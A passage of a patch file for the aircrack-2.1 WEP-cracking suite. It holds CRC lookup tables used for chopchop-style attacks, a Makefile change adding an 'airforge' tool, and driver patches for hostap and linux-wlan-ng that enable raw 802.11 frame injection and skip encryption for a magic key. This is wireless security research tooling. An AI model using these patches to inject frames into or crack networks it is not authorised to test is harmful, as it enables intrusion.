-+ 0x4DB26158, 0x3AB551CE, 0xA3BC0074, 0xD4BB30E2, 0x4ADFA541, 0x3DD895D7, 0xA4D1C46D, 0xD3D6F4FB,
-+ 0x4369E96A, 0x346ED9FC, 0xAD678846, 0xDA60B8D0, 0x44042D73, 0x33031DE5, 0xAA0A4C5F, 0xDD0D7CC9,
-+ 0x5005713C, 0x270241AA, 0xBE0B1010, 0xC90C2086, 0x5768B525, 0x206F85B3, 0xB966D409, 0xCE61E49F,
-+ 0x5EDEF90E, 0x29D9C998, 0xB0D09822, 0xC7D7A8B4, 0x59B33D17, 0x2EB40D81, 0xB7BD5C3B, 0xC0BA6CAD,
-+ 0xEDB88320, 0x9ABFB3B6, 0x03B6E20C, 0x74B1D29A, 0xEAD54739, 0x9DD277AF, 0x04DB2615, 0x73DC1683,
-+ 0xE3630B12, 0x94643B84, 0x0D6D6A3E, 0x7A6A5AA8, 0xE40ECF0B, 0x9309FF9D, 0x0A00AE27, 0x7D079EB1,
-+ 0xF00F9344, 0x8708A3D2, 0x1E01F268, 0x6906C2FE, 0xF762575D, 0x806567CB, 0x196C3671, 0x6E6B06E7,
-+ 0xFED41B76, 0x89D32BE0, 0x10DA7A5A, 0x67DD4ACC, 0xF9B9DF6F, 0x8EBEEFF9, 0x17B7BE43, 0x60B08ED5,
-+ 0xD6D6A3E8, 0xA1D1937E, 0x38D8C2C4, 0x4FDFF252, 0xD1BB67F1, 0xA6BC5767, 0x3FB506DD, 0x48B2364B,
-+ 0xD80D2BDA, 0xAF0A1B4C, 0x36034AF6, 0x41047A60, 0xDF60EFC3, 0xA867DF55, 0x316E8EEF, 0x4669BE79,
-+ 0xCB61B38C, 0xBC66831A, 0x256FD2A0, 0x5268E236, 0xCC0C7795, 0xBB0B4703, 0x220216B9, 0x5505262F,
-+ 0xC5BA3BBE, 0xB2BD0B28, 0x2BB45A92, 0x5CB36A04, 0xC2D7FFA7, 0xB5D0CF31, 0x2CD99E8B, 0x5BDEAE1D,
-+ 0x9B64C2B0, 0xEC63F226, 0x756AA39C, 0x026D930A, 0x9C0906A9, 0xEB0E363F, 0x72076785, 0x05005713,
-+ 0x95BF4A82, 0xE2B87A14, 0x7BB12BAE, 0x0CB61B38, 0x92D28E9B, 0xE5D5BE0D, 0x7CDCEFB7, 0x0BDBDF21,
-+ 0x86D3D2D4, 0xF1D4E242, 0x68DDB3F8, 0x1FDA836E, 0x81BE16CD, 0xF6B9265B, 0x6FB077E1, 0x18B74777,
-+ 0x88085AE6, 0xFF0F6A70, 0x66063BCA, 0x11010B5C, 0x8F659EFF, 0xF862AE69, 0x616BFFD3, 0x166CCF45,
-+ 0xA00AE278, 0xD70DD2EE, 0x4E048354, 0x3903B3C2, 0xA7672661, 0xD06016F7, 0x4969474D, 0x3E6E77DB,
-+ 0xAED16A4A, 0xD9D65ADC, 0x40DF0B66, 0x37D83BF0, 0xA9BCAE53, 0xDEBB9EC5, 0x47B2CF7F, 0x30B5FFE9,
-+ 0xBDBDF21C, 0xCABAC28A, 0x53B39330, 0x24B4A3A6, 0xBAD03605, 0xCDD70693, 0x54DE5729, 0x23D967BF,
-+ 0xB3667A2E, 0xC4614AB8, 0x5D681B02, 0x2A6F2B94, 0xB40BBE37, 0xC30C8EA1, 0x5A05DF1B, 0x2D02EF8D
-+};
-+
-+const unsigned char crc_chop_tbl[256][4] =
-+{
-+ { 0x26,0x70,0x6A,0x0F }, { 0x67,0x76,0x1B,0xD4 }, { 0xE5,0x7A,0xF9,0x62 }, { 0xA4,0x7C,0x88,0xB9 },
-+ { 0xA0,0x65,0x4C,0xD4 }, { 0xE1,0x63,0x3D,0x0F }, { 0x63,0x6F,0xDF,0xB9 }, { 0x22,0x69,0xAE,0x62 },
-+ { 0x6B,0x5D,0x57,0x62 }, { 0x2A,0x5B,0x26,0xB9 }, { 0xA8,0x57,0xC4,0x0F }, { 0xE9,0x51,0xB5,0xD4 },
-+ { 0xED,0x48,0x71,0xB9 }, { 0xAC,0x4E,0x00,0x62 }, { 0x2E,0x42,0xE2,0xD4 }, { 0x6F,0x44,0x93,0x0F },
-+ { 0xBC,0x2A,0x10,0xD5 }, { 0xFD,0x2C,0x61,0x0E }, { 0x7F,0x20,0x83,0xB8 }, { 0x3E,0x26,0xF2,0x63 },
-+ { 0x3A,0x3F,0x36,0x0E }, { 0x7B,0x39,0x47,0xD5 }, { 0xF9,0x35,0xA5,0x63 }, { 0xB8,0x33,0xD4,0xB8 },
-+ { 0xF1,0x07,0x2D,0xB8 }, { 0xB0,0x01,0x5C,0x63 }, { 0x32,0x0D,0xBE,0xD5 }, { 0x73,0x0B,0xCF,0x0E },
-+ { 0x77,0x12,0x0B,0x63 }, { 0x36,0x14,0x7A,0xB8 }, { 0xB4,0x18,0x98,0x0E }, { 0xF5,0x1E,0xE9,0xD5 },
-+ { 0x53,0xC3,0xEF,0x60 }, { 0x12,0xC5,0x9E,0xBB }, { 0x90,0xC9,0x7C,0x0D }, { 0xD1,0xCF,0x0D,0xD6 },
-+ { 0xD5,0xD6,0xC9,0xBB }, { 0x94,0xD0,0xB8,0x60 }, { 0x16,0xDC,0x5A,0xD6 }, { 0x57,0xDA,0x2B,0x0D },
-+ { 0x1E,0xEE,0xD2,0x0D }, { 0x5F,0xE8,0xA3,0xD6 }, { 0xDD,0xE4,0x41,0x60 }, { 0x9C,0xE2,0x30,0xBB },
-+ { 0x98,0xFB,0xF4,0xD6 }, { 0xD9,0xFD,0x85,0x0D }, { 0x5B,0xF1,0x67,0xBB }, { 0x1A,0xF7,0x16,0x60 },
-+ { 0xC9,0x99,0x95,0xBA }, { 0x88,0x9F,0xE4,0x61 }, { 0x0A,0x93,0x06,0xD7 }, { 0x4B,0x95,0x77,0x0C },
-+ { 0x4F,0x8C,0xB3,0x61 }, { 0x0E,0x8A,0xC2,0xBA }, { 0x8C,0x86,0x20,0x0C }, { 0xCD,0x80,0x51,0xD7 },
-+ { 0x84,0xB4,0xA8,0xD7 }, { 0xC5,0xB2,0xD9,0x0C }, { 0x47,0xBE,0x3B,0xBA }, { 0x06,0xB8,0x4A,0x61 },
-+ { 0x02,0xA1,0x8E,0x0C }, { 0x43,0xA7,0xFF,0xD7 }, { 0xC1,0xAB,0x1D,0x61 }, { 0x80,0xAD,0x6C,0xBA },
-+ { 0xCC,0x16,0x61,0xD0 }, { 0x8D,0x10,0x10,0x0B }, { 0x0F,0x1C,0xF2,0xBD }, { 0x4E,0x1A,0x83,0x66 },
-+ { 0x4A,0x03,0x47,0x0B }, { 0x0B,0x05,0x36,0xD0 }, { 0x89,0x09,0xD4,0x66 }, { 0xC8,0x0F,0xA5,0xBD },
-+ { 0x81,0x3B,0x5C,0xBD }, { 0xC0,0x3D,0x2D,0x66 }, { 0x42,0x31,0xCF,0xD0 }, { 0x03,0x37,0xBE,0x0B },
-+ { 0x07,0x2E,0x7A,0x66 }, { 0x46,0x28,0x0B,0xBD }, { 0xC4,0x24,0xE9,0x0B }, { 0x85,0x22,0x98,0xD0 },
-+ { 0x56,0x4C,0x1B,0x0A }, { 0x17,0x4A,0x6A,0xD1 }, { 0x95,0x46,0x88,0x67 }, { 0xD4,0x40,0xF9,0xBC },
-+ { 0xD0,0x59,0x3D,0xD1 }, { 0x91,0x5F,0x4C,0x0A }, { 0x13,0x53,0xAE,0xBC }, { 0x52,0x55,0xDF,0x67 },
-+ { 0x1B,0x61,0x26,0x67 }, { 0x5A,0x67,0x57,0xBC }, { 0xD8,0x6B,0xB5,0x0A }, { 0x99,0x6D,0xC4,0xD1 },
-+ { 0x9D,0x74,0x00,0xBC }, { 0xDC,0x72,0x71,0x67 }, { 0x5E,0x7E,0x93,0xD1 }, { 0x1F,0x78,0xE2,0x0A },
-+ { 0xB9,0xA5,0xE4,0xBF }, { 0xF8,0xA3,0x95,0x64 }, { 0x7A,0xAF,0x77,0xD2 }, { 0x3B,0xA9,0x06,0x09 },
-+ { 0x3F,0xB0,0xC2,0x64 }, { 0x7E,0xB6,0xB3,0xBF }, { 0xFC,0xBA,0x51,0x09 }, { 0xBD,0xBC,0x20,0xD2 },
-+ { 0xF4,0x88,0xD9,0xD2 }, { 0xB5,0x8E,0xA8,0x09 }, { 0x37,0x82,0x4A,0xBF }, { 0x76,0x84,0x3B,0x64 },
-+ { 0x72,0x9D,0xFF,0x09 }, { 0x33,0x9B,0x8E,0xD2 }, { 0xB1,0x97,0x6C,0x64 }, { 0xF0,0x91,0x1D,0xBF },
-+ { 0x23,0xFF,0x9E,0x65 }, { 0x62,0xF9,0xEF,0xBE }, { 0xE0,0xF5,0x0D,0x08 }, { 0xA1,0xF3,0x7C,0xD3 },
-+ { 0xA5,0xEA,0xB8,0xBE }, { 0xE4,0xEC,0xC9,0x65 }, { 0x66,0xE0,0x2B,0xD3 }, { 0x27,0xE6,0x5A,0x08 },
-+ { 0x6E,0xD2,0xA3,0x08 }, { 0x2F,0xD4,0xD2,0xD3 }, { 0xAD,0xD8,0x30,0x65 }, { 0xEC,0xDE,0x41,0xBE },
-+ { 0xE8,0xC7,0x85,0xD3 }, { 0xA9,0xC1,0xF4,0x08 }, { 0x2B,0xCD,0x16,0xBE }, { 0x6A,0xCB,0x67,0x65 },
-+ { 0xB3,0xBB,0x0D,0x6A }, { 0xF2,0xBD,0x7C,0xB1 }, { 0x70,0xB1,0x9E,0x07 }, { 0x31,0xB7,0xEF,0xDC },
-+ { 0x35,0xAE,0x2B,0xB1 }, { 0x74,0xA8,0x5A,0x6A }, { 0xF6,0xA4,0xB8,0xDC }, { 0xB7,0xA2,0xC9,0x07 },
-+ { 0xFE,0x96,0x30,0x07 }, { 0xBF,0x90,0x41,0xDC }, { 0x3D,0x9C,0xA3,0x6A }, { 0x7C,0x9A,0xD2,0xB1 },
-+ { 0x78,0x83,0x16,0xDC }, { 0x39,0x85,0x67,0x07 }, { 0xBB,0x89,0x85,0xB1 }, { 0xFA,0x8F,0xF4,0x6A },
-+ { 0x29,0xE1,0x77,0xB0 }, { 0x68,0xE7,0x06,0x6B }, { 0xEA,0xEB,0xE4,0xDD }, { 0xAB,0xED,0x95,0x06 },
-+ { 0xAF,0xF4,0x51,0x6B }, { 0xEE,0xF2,0x20,0xB0 }, { 0x6C,0xFE,0xC2,0x06 }, { 0x2D,0xF8,0xB3,0xDD },
-+ { 0x64,0xCC,0x4A,0xDD }, { 0x25,0xCA,0x3B,0x06 }, { 0xA7,0xC6,0xD9,0xB0 }, { 0xE6,0xC0,0xA8,0x6B },
-+ { 0xE2,0xD9,0x6C,0x06 }, { 0xA3,0xDF,0x1D,0xDD }, { 0x21,0xD3,0xFF,0x6B }, { 0x60,0xD5,0x8E,0xB0 },
-+ { 0xC6,0x08,0x88,0x05 }, { 0x87,0x0E,0xF9,0xDE }, { 0x05,0x02,0x1B,0x68 }, { 0x44,0x04,0x6A,0xB3 },
-+ { 0x40,0x1D,0xAE,0xDE }, { 0x01,0x1B,0xDF,0x05 }, { 0x83,0x17,0x3D,0xB3 }, { 0xC2,0x11,0x4C,0x68 },
-+ { 0x8B,0x25,0xB5,0x68 }, { 0xCA,0x23,0xC4,0xB3 }, { 0x48,0x2F,0x26,0x05 }, { 0x09,0x29,0x57,0xDE },
-+ { 0x0D,0x30,0x93,0xB3 }, { 0x4C,0x36,0xE2,0x68 }, { 0xCE,0x3A,0x00,0xDE }, { 0x8F,0x3C,0x71,0x05 },
-+ { 0x5C,0x52,0xF2,0xDF }, { 0x1D,0x54,0x83,0x04 }, { 0x9F,0x58,0x61,0xB2 }, { 0xDE,0x5E,0x10,0x69 },
-+ { 0xDA,0x47,0xD4,0x04 }, { 0x9B,0x41,0xA5,0xDF }, { 0x19,0x4D,0x47,0x69 }, { 0x58,0x4B,0x36,0xB2 },
-+ { 0x11,0x7F,0xCF,0xB2 }, { 0x50,0x79,0xBE,0x69 }, { 0xD2,0x75,0x5C,0xDF }, { 0x93,0x73,0x2D,0x04 },
-+ { 0x97,0x6A,0xE9,0x69 }, { 0xD6,0x6C,0x98,0xB2 }, { 0x54,0x60,0x7A,0x04 }, { 0x15,0x66,0x0B,0xDF },
-+ { 0x59,0xDD,0x06,0xB5 }, { 0x18,0xDB,0x77,0x6E }, { 0x9A,0xD7,0x95,0xD8 }, { 0xDB,0xD1,0xE4,0x03 },
-+ { 0xDF,0xC8,0x20,0x6E }, { 0x9E,0xCE,0x51,0xB5 }, { 0x1C,0xC2,0xB3,0x03 }, { 0x5D,0xC4,0xC2,0xD8 },
-+ { 0x14,0xF0,0x3B,0xD8 }, { 0x55,0xF6,0x4A,0x03 }, { 0xD7,0xFA,0xA8,0xB5 }, { 0x96,0xFC,0xD9,0x6E },
-+ { 0x92,0xE5,0x1D,0x03 }, { 0xD3,0xE3,0x6C,0xD8 }, { 0x51,0xEF,0x8E,0x6E }, { 0x10,0xE9,0xFF,0xB5 },
-+ { 0xC3,0x87,0x7C,0x6F }, { 0x82,0x81,0x0D,0xB4 }, { 0x00,0x8D,0xEF,0x02 }, { 0x41,0x8B,0x9E,0xD9 },
-+ { 0x45,0x92,0x5A,0xB4 }, { 0x04,0x94,0x2B,0x6F }, { 0x86,0x98,0xC9,0xD9 }, { 0xC7,0x9E,0xB8,0x02 },
-+ { 0x8E,0xAA,0x41,0x02 }, { 0xCF,0xAC,0x30,0xD9 }, { 0x4D,0xA0,0xD2,0x6F }, { 0x0C,0xA6,0xA3,0xB4 },
-+ { 0x08,0xBF,0x67,0xD9 }, { 0x49,0xB9,0x16,0x02 }, { 0xCB,0xB5,0xF4,0xB4 }, { 0x8A,0xB3,0x85,0x6F },
-+ { 0x2C,0x6E,0x83,0xDA }, { 0x6D,0x68,0xF2,0x01 }, { 0xEF,0x64,0x10,0xB7 }, { 0xAE,0x62,0x61,0x6C },
-+ { 0xAA,0x7B,0xA5,0x01 }, { 0xEB,0x7D,0xD4,0xDA }, { 0x69,0x71,0x36,0x6C }, { 0x28,0x77,0x47,0xB7 },
-+ { 0x61,0x43,0xBE,0xB7 }, { 0x20,0x45,0xCF,0x6C }, { 0xA2,0x49,0x2D,0xDA }, { 0xE3,0x4F,0x5C,0x01 },
-+ { 0xE7,0x56,0x98,0x6C }, { 0xA6,0x50,0xE9,0xB7 }, { 0x24,0x5C,0x0B,0x01 }, { 0x65,0x5A,0x7A,0xDA },
-+ { 0xB6,0x34,0xF9,0x00 }, { 0xF7,0x32,0x88,0xDB }, { 0x75,0x3E,0x6A,0x6D }, { 0x34,0x38,0x1B,0xB6 },
-+ { 0x30,0x21,0xDF,0xDB }, { 0x71,0x27,0xAE,0x00 }, { 0xF3,0x2B,0x4C,0xB6 }, { 0xB2,0x2D,0x3D,0x6D },
-+ { 0xFB,0x19,0xC4,0x6D }, { 0xBA,0x1F,0xB5,0xB6 }, { 0x38,0x13,0x57,0x00 }, { 0x79,0x15,0x26,0xDB },
-+ { 0x7D,0x0C,0xE2,0xB6 }, { 0x3C,0x0A,0x93,0x6D }, { 0xBE,0x06,0x71,0xDB }, { 0xFF,0x00,0x00,0x00 }
-+};
-+
-+#endif /* crctable.h */
-diff -urN aircrack-2.1.orig/Makefile aircrack-2.1/Makefile
---- aircrack-2.1.orig/Makefile 2004-10-01 21:30:00.000000000 +0200
-+++ aircrack-2.1/Makefile 2005-04-22 08:53:15.398815552 +0200
-@@ -7,13 +7,14 @@
- docdir = $(datadir)/aircrack
-
- DESTDIR =
--BINFILES = 802ether aircrack aireplay airodump hopper.sh
-+BINFILES = 802ether aircrack aireplay airodump airforge hopper.sh
- DOCFILES = ChangeLog rawsend.patch docs/aircrack.html
-
- all:
- $(CC) $(CFLAGS) $(OPTFLAGS) 802ether.c -o 802ether
- $(CC) $(CFLAGS) $(OPTFLAGS) aircrack.c -o aircrack
- $(CC) $(CFLAGS) $(OPTFLAGS) aireplay.c -o aireplay
-+ $(CC) $(CFLAGS) $(OPTFLAGS) airforge.c -o airforge
- $(CC) $(CFLAGS) $(OPTFLAGS) airodump.c -o airodump
-
- install:
-@@ -25,4 +26,4 @@
- install -m 644 $(DOCFILES) $(DESTDIR)$(docdir)
-
- clean:
-- rm -f *.o 802ether aircrack aireplay airodump
-+ rm -f *.o 802ether aircrack aireplay airforge airodump
-diff -urN aircrack-2.1.orig/patch/hostap-driver-0.3.7.patch.0.1 aircrack-2.1/patch/hostap-driver-0.3.7.patch.0.1
---- aircrack-2.1.orig/patch/hostap-driver-0.3.7.patch.0.1 1970-01-01 01:00:00.000000000 +0100
-+++ aircrack-2.1/patch/hostap-driver-0.3.7.patch.0.1 2005-04-22 08:51:21.935064664 +0200
-@@ -0,0 +1,12 @@
-+diff -aur hostap-driver-0.3.7-orig/driver/modules/hostap_80211_tx.c hostap-driver-0.3.7/driver/modules/hostap_80211_tx.c
-+--- hostap-driver-0.3.7-orig/driver/modules/hostap_80211_tx.c 2004-07-06 01:45:01.000000000 +0200
-++++ hostap-driver-0.3.7/driver/modules/hostap_80211_tx.c 2005-03-14 13:53:20.000000000 +0100
-+@@ -466,7 +466,7 @@
-+ goto fail;
-+ }
-+
-+- if (tx.crypt) {
-++ if (tx.crypt && memcmp(tx.crypt->priv+4,"\x01\x02\x04\x08\x10",5)) {
-+ skb = hostap_tx_encrypt(skb, tx.crypt);
-+ if (skb == NULL) {
-+ printk(KERN_DEBUG "%s: TX - encryption failed\n",
-diff -urN aircrack-2.1.orig/patch/linux-wlan-ng-0.2.1-pre26.patch.0.1 aircrack-2.1/patch/linux-wlan-ng-0.2.1-pre26.patch.0.1
---- aircrack-2.1.orig/patch/linux-wlan-ng-0.2.1-pre26.patch.0.1 1970-01-01 01:00:00.000000000 +0100
-+++ aircrack-2.1/patch/linux-wlan-ng-0.2.1-pre26.patch.0.1 2005-04-22 08:51:21.936064512 +0200
-@@ -0,0 +1,284 @@
-+diff -aur linux-wlan-ng-0.2.1-pre26-orig/src/p80211/p80211netdev.c linux-wlan-ng-0.2.1-pre26/src/p80211/p80211netdev.c
-+--- linux-wlan-ng-0.2.1-pre26-orig/src/p80211/p80211netdev.c 2005-01-11 18:43:54.000000000 +0100
-++++ linux-wlan-ng-0.2.1-pre26/src/p80211/p80211netdev.c 2005-03-14 13:58:11.000000000 +0100
-+@@ -525,7 +525,7 @@
-+ * and return success .
-+ * TODO: we need a saner way to handle this
-+ */
-+- if(skb->protocol != ETH_P_80211_RAW) {
-++ if(skb->protocol != htons(ETH_P_80211_RAW)) {
-+ p80211netdev_start_queue(wlandev);
-+ WLAN_LOG_NOTICE(
-+ "Tx attempt prior to association, frame dropped.\n");
-+@@ -537,7 +537,7 @@
-+ }
-+
-+ /* Check for raw transmits */
-+- if(skb->protocol == ETH_P_80211_RAW) {
-++ if(skb->protocol == htons(ETH_P_80211_RAW)) {
-+ if (!capable(CAP_NET_ADMIN)) {
-+ return(-EPERM);
-+ }
-+@@ -965,8 +965,9 @@
-+ dev->set_mac_address = p80211knetdev_set_mac_address;
-+ #endif
-+ #ifdef HAVE_TX_TIMEOUT
-+- dev->tx_timeout = &p80211knetdev_tx_timeout;
-+- dev->watchdog_timeo = (wlan_watchdog * HZ) / 1000;
-++// KoreK: still not implemented
-++// dev->tx_timeout = &p80211knetdev_tx_timeout;
-++// dev->watchdog_timeo = (wlan_watchdog * HZ) / 1000;
-+ #endif
-+
-+ }
-+diff -aur linux-wlan-ng-0.2.1-pre26-orig/src/prism2/driver/Makefile linux-wlan-ng-0.2.1-pre26/src/prism2/driver/Makefile
-+--- linux-wlan-ng-0.2.1-pre26-orig/src/prism2/driver/Makefile 2005-01-25 02:41:44.000000000 +0100
-++++ linux-wlan-ng-0.2.1-pre26/src/prism2/driver/Makefile 2005-03-14 13:58:11.000000000 +0100
-+@@ -88,7 +88,7 @@
-+ MODVERDIR=$(WLAN_SRC)/.tmp_versions modules
-+ else # kbuild 2.4
-+
-+- $(MAKE) -C $(LINUX_SRC) SUBDIRS=$(PWD) WLAN_SRC=$(PWD) \
-++ $(MAKE) -C $(LINUX_SRC) SUBDIRS=$(PWD) WLAN_SRC=$(WLAN_SRC) \
-+ modules
-+
-+ endif # kbuild switch
-+diff -aur linux-wlan-ng-0.2.1-pre26-orig/src/prism2/driver/hfa384x.c linux-wlan-ng-0.2.1-pre26/src/prism2/driver/hfa384x.c
-+--- linux-wlan-ng-0.2.1-pre26-orig/src/prism2/driver/hfa384x.c 2005-01-25 01:38:50.000000000 +0100
-++++ linux-wlan-ng-0.2.1-pre26/src/prism2/driver/hfa384x.c 2005-03-14 15:21:02.000000000 +0100
-+@@ -1941,8 +1941,14 @@
-+
-+ DBFENTER;
-+
-+- cmd.cmd = HFA384x_CMD_CMDCODE_SET(HFA384x_CMDCODE_MONITOR) |
-+- HFA384x_CMD_AINFO_SET(enable);
-++ if (enable == HFA384x_MONITOR_ENABLE) {
-++ // KoreK: get into test mode 0x0a
-++ cmd.cmd = HFA384x_CMD_CMDCODE_SET(HFA384x_CMDCODE_MONITOR) |
-++ HFA384x_CMD_AINFO_SET(0x0a);
-++ } else {
-++ cmd.cmd = HFA384x_CMD_CMDCODE_SET(HFA384x_CMDCODE_MONITOR) |
-++ HFA384x_CMD_AINFO_SET(enable);
-++ }
-+ cmd.parm0 = 0;
-+ cmd.parm1 = 0;
-+ cmd.parm2 = 0;
-+@@ -3178,13 +3184,26 @@
-+ HFA384x_TX_TXEX_SET(0) | HFA384x_TX_TXOK_SET(0);
-+ #endif
-+
-+- /* if we're using host WEP, increase size by IV+ICV */
-+- if (p80211_wep->data) {
-+- txdesc.data_len = host2hfa384x_16(skb->len+8);
-+- // txdesc.tx_control |= HFA384x_TX_NOENCRYPT_SET(1);
-+- } else {
-+- txdesc.data_len = host2hfa384x_16(skb->len);
-+- }
-++ if (skb->protocol != htons(ETH_P_80211_RAW)) {
-++ /* if we're using host WEP, increase size by IV+ICV */
-++ if (p80211_wep->data) {
-++ txdesc.data_len = host2hfa384x_16(skb->len+8);
-++ // txdesc.tx_control |= HFA384x_TX_NOENCRYPT_SET(1);
-++ } else {
-++ txdesc.data_len = host2hfa384x_16(skb->len);
-++ }
-++ } else {
-++ /* KoreK: raw injection (monitor mode): pull the rest of
-++ the header and ssanity check on txdesc.data_len */
-++ memcpy(&(txdesc.data_len), skb->data, 16);
-++ skb_pull(skb,16);
-++ if (txdesc.data_len != host2hfa384x_16(skb->len)) {
-++ printk(KERN_DEBUG "mismatch frame_len, drop frame\n");
-++ return 0;
-++ }
-++
-++ txdesc.tx_control |= HFA384x_TX_RETRYSTRAT_SET(1);
-++ }
-+
-+ txdesc.tx_control = host2hfa384x_16(txdesc.tx_control);
-+ /* copy the header over to the txdesc */
-+@@ -3207,7 +3226,7 @@
-+ spin_lock(&hw->cmdlock);
-+
-+ /* Copy descriptor+payload to FID */
-+- if (p80211_wep->data) {
-++ if (p80211_wep->data && (skb->protocol != htons(ETH_P_80211_RAW))) {
-+ result = hfa384x_copy_to_bap4(hw, HFA384x_BAP_PROC, fid, 0,
-+ &txdesc, sizeof(txdesc),
-+ p80211_wep->iv, sizeof(p80211_wep->iv),
-+@@ -3657,6 +3676,16 @@
-+ switch( HFA384x_RXSTATUS_MACPORT_GET(rxdesc.status) )
-+ {
-+ case 0:
-++ /* KoreK: this testmode uses macport 0 */
-++ if ((wlandev->netdev->type == ARPHRD_IEEE80211) ||
-++ (wlandev->netdev->type == ARPHRD_IEEE80211_PRISM)) {
-++ if ( ! HFA384x_RXSTATUS_ISFCSERR(rxdesc.status) ) {
-++ hfa384x_int_rxmonitor( wlandev, rxfid, &rxdesc);
-++ } else {
-++ WLAN_LOG_DEBUG(3,"Received monitor frame: FCSerr set\n");
-++ }
-++ goto done;
-++ }
-+
-+ fc = ieee2host16(rxdesc.frame_control);
-+
-+diff -aur linux-wlan-ng-0.2.1-pre26-orig/src/prism2/driver/hfa384x_usb.c linux-wlan-ng-0.2.1-pre26/src/prism2/driver/hfa384x_usb.c
-+--- linux-wlan-ng-0.2.1-pre26-orig/src/prism2/driver/hfa384x_usb.c 2005-01-17 17:24:40.000000000 +0100
-++++ linux-wlan-ng-0.2.1-pre26/src/prism2/driver/hfa384x_usb.c 2005-03-14 15:27:57.000000000 +0100
-+@@ -1143,8 +1143,14 @@
-+
-+ DBFENTER;
-+
-+- cmd.cmd = HFA384x_CMD_CMDCODE_SET(HFA384x_CMDCODE_MONITOR) |
-+- HFA384x_CMD_AINFO_SET(enable);
-++ if (enable == HFA384x_MONITOR_ENABLE) {
-++ // KoreK: get into test mode 0x0a
-++ cmd.cmd = HFA384x_CMD_CMDCODE_SET(HFA384x_CMDCODE_MONITOR) |
-++ HFA384x_CMD_AINFO_SET(0x0a);
-++ } else {
-++ cmd.cmd = HFA384x_CMD_CMDCODE_SET(HFA384x_CMDCODE_MONITOR) |
-++ HFA384x_CMD_AINFO_SET(enable);
-++ }
-+ cmd.parm0 = 0;
-+ cmd.parm1 = 0;
-+ cmd.parm2 = 0;
-+@@ -3258,37 +3264,59 @@
-+ HFA384x_TX_MACPORT_SET(0) | HFA384x_TX_STRUCTYPE_SET(1) |
-+ HFA384x_TX_TXEX_SET(0) | HFA384x_TX_TXOK_SET(0);
-+ #endif
-+- hw->txbuff.txfrm.desc.tx_control =
-+- host2hfa384x_16(hw->txbuff.txfrm.desc.tx_control);
-+
-+- /* copy the header over to the txdesc */
-+- memcpy(&(hw->txbuff.txfrm.desc.frame_control), p80211_hdr, sizeof(p80211_hdr_t));
-++ if (skb->protocol != htons(ETH_P_80211_RAW)) {
-++ hw->txbuff.txfrm.desc.tx_control =
-++ host2hfa384x_16(hw->txbuff.txfrm.desc.tx_control);
-++
-++ /* copy the header over to the txdesc */
-++ memcpy(&(hw->txbuff.txfrm.desc.frame_control), p80211_hdr,
-++ sizeof(p80211_hdr_t));
-++
-++ /* if we're using host WEP, increase size by IV+ICV */
-++ if (p80211_wep->data) {
-++ hw->txbuff.txfrm.desc.data_len = host2hfa384x_16(skb->len+8);
-++ // hw->txbuff.txfrm.desc.tx_control |= HFA384x_TX_NOENCRYPT_SET(1);
-++ usbpktlen+=8;
-++ } else {
-++ hw->txbuff.txfrm.desc.data_len = host2hfa384x_16(skb->len);
-++ }
-++ } else {
-++ /* KoreK: raw injection (monitor mode): pull the rest of
-++ the header and ssanity check on txdesc.data_len */
-++ memcpy(&(hw->txbuff.txfrm.desc.data_len), skb->data, 16);
-++ skb_pull(skb,16);
-++ if (hw->txbuff.txfrm.desc.data_len != host2hfa384x_16(skb->len)) {
-++ printk(KERN_DEBUG "mismatch frame_len, drop frame\n");
-++ return 0;
-++ }
-+
-+- /* if we're using host WEP, increase size by IV+ICV */
-+- if (p80211_wep->data) {
-+- hw->txbuff.txfrm.desc.data_len = host2hfa384x_16(skb->len+8);
-+- // hw->txbuff.txfrm.desc.tx_control |= HFA384x_TX_NOENCRYPT_SET(1);
-+- usbpktlen+=8;
-+- } else {
-+- hw->txbuff.txfrm.desc.data_len = host2hfa384x_16(skb->len);
-++ hw->txbuff.txfrm.desc.tx_control |= HFA384x_TX_RETRYSTRAT_SET(1);
-++ hw->txbuff.txfrm.desc.tx_control =
-++ host2hfa384x_16(hw->txbuff.txfrm.desc.tx_control);
-++
-++ /* copy the header over to the txdesc */
-++ memcpy(&(hw->txbuff.txfrm.desc.frame_control), p80211_hdr,
-++ sizeof(p80211_hdr_t));
-+ }
-+
-+ usbpktlen += skb->len;
-+
-+ /* copy over the WEP IV if we are using host WEP */
-+ ptr = hw->txbuff.txfrm.data;
-+- if (p80211_wep->data) {
-++ if (p80211_wep->data && skb->protocol != htons(ETH_P_80211_RAW)) {
-+ memcpy(ptr, p80211_wep->iv, sizeof(p80211_wep->iv));
-+ ptr+= sizeof(p80211_wep->iv);
-+ memcpy(ptr, p80211_wep->data, skb->len);
-+ } else {
-+ memcpy(ptr, skb->data, skb->len);
-+ }
-++
-+ /* copy over the packet data */
-+ ptr+= skb->len;
-+
-+ /* copy over the WEP ICV if we are using host WEP */
-+- if (p80211_wep->data) {
-++ if (p80211_wep->data && skb->protocol != htons(ETH_P_80211_RAW)) {
-+ memcpy(ptr, p80211_wep->icv, sizeof(p80211_wep->icv));
-+ }
-+
-+@@ -4105,6 +4133,17 @@
-+ switch( HFA384x_RXSTATUS_MACPORT_GET(usbin->rxfrm.desc.status))
-+ {
-+ case 0:
-++ /* KoreK: this testmode uses macport 0 */
-++ if ((wlandev->netdev->type == ARPHRD_IEEE80211) ||
-++ (wlandev->netdev->type == ARPHRD_IEEE80211_PRISM)) {
-++ if ( ! HFA384x_RXSTATUS_ISFCSERR(usbin->rxfrm.desc.status) ) {
-++ hfa384x_int_rxmonitor(wlandev, &usbin->rxfrm);
-++ } else {
-++ WLAN_LOG_DEBUG(3,"Received monitor frame: FCSerr set\n");
-++ }
-++ goto done;
-++ }
-++
-+ w_hdr = (p80211_hdr_t *) &(usbin->rxfrm.desc.frame_control);
-+ fc = ieee2host16(usbin->rxfrm.desc.frame_control);
-+
-+diff -aur linux-wlan-ng-0.2.1-pre26-orig/src/prism2/driver/prism2mgmt.c linux-wlan-ng-0.2.1-pre26/src/prism2/driver/prism2mgmt.c
-+--- linux-wlan-ng-0.2.1-pre26-orig/src/prism2/driver/prism2mgmt.c 2005-01-25 01:38:50.000000000 +0100
-++++ linux-wlan-ng-0.2.1-pre26/src/prism2/driver/prism2mgmt.c 2005-03-14 13:58:11.000000000 +0100
-+@@ -2855,9 +2855,10 @@
-+ }
-+
-+ /* Now if we're already sniffing, we can skip the rest */
-+- if (wlandev->netdev->type != ARPHRD_ETHER) {
-++ if ((wlandev->netdev->type != ARPHRD_IEEE80211) &&
-++ (wlandev->netdev->type != ARPHRD_IEEE80211_PRISM)) {
-+ /* Set the port type to pIbss */
-+- word = HFA384x_PORTTYPE_PSUEDOIBSS;
